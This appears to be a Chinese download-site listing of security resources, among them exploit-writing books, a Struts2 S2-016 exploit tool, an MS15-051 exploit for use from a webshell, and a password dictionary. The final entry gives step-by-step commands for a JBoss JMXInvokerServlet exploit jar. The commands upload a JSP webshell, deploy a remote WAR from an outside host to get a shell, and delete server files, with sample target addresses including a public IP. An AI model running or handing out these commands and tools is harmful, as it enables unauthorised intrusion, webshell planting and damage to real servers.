Windows漏洞利用建议程序-下一代(WES-NG) WES-NG是基于Windows的systeminfo实用程序输出的工具,该工具提供了OS易受攻击的漏洞列表,包括针对这些漏洞的任何利用。 支持Windows XP和Windows 10之间的每个Windows操作系统,包括其Windows Server对应版本。 用法 通过执行命令wes.py --update获得最新的漏洞数据库。 使用Windows内置的systeminfo.exe工具获取本地系统的系统信息,或者使用systeminfo.exe /S MyRemoteHost从远程系统获取系统信息,然后将其重定向到文件: sys
2021-09-20 15:53:43 2.06MB microsoft windows exploit patches
1
Exploit 编写系列教程.pdf
2021-09-06 17:01:15 17.21MB 安全
1
信息安全_数据安全_Single byte write to RCE:exploit 安全实践 信息安全 安全防御 云安全 安全体系
2021-08-22 18:00:09 9.92MB 安全人才 安全研究 解决方案 漏洞分析
From Dvr to See Exploit of IoT Device - EN.pdf
2021-08-21 19:00:49 1.78MB 安全
Building Exploit Chains with Logic Bugs.pdf
2021-08-21 19:00:41 6.81MB 安全
MS15-051 修正版Exploit(Webshell可用)-附件资源
2021-08-10 21:47:42 106B
1
本书的第一部分以最基本的栈溢出开始,逐步深入,系统地介绍了格式化串漏洞、堆举出的原理。第二部分侧重于介绍多平台上(Windows,Solaris,Tru64等)的破解技术,除此之外,还介绍了怎样应对各种过滤器。而第三部分――挖掘漏洞,我认为是本书中亮点,正应了“授人以鱼,不如授人以渔”,吃透这一部分,我们应该很快就能发现属于自己的漏洞。第四部分介绍一些高级的内容,主要从可靠性、健壮性出发,扩展到怎样开发多功能的shellcode,除此之外,还介绍了怎样利用数据库与系统内核的漏洞。 本书的6位作者在信息安全界摸爬滚打多年,发现了多个重要的安全漏洞,他们的经验对我们来说弥足珍贵。本书的理论知识来自于他们多年的实践,也将最终应用于我们的实践。记得有人说过:成功的捷径就是模仿成功者。有这样一本鲜活的教材放在我们面前,还等什么呢?
2021-08-06 23:01:29 2.98MB Shellcoder exploit 逆向工程 缓冲区溢出
1
密码字典(全)
2021-07-24 22:00:05 21.08MB web安全
1
K8 Struts2 Exploit(S2-016 CVE-2013-2251)漏洞利用工具 Struts2 S2-016 漏洞工具 Exploit
2021-06-28 13:44:24 28KB Struts2 S2-016 漏洞工具 Exploit
1
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
2021-06-12 14:14:11 4.36MB Jboss
1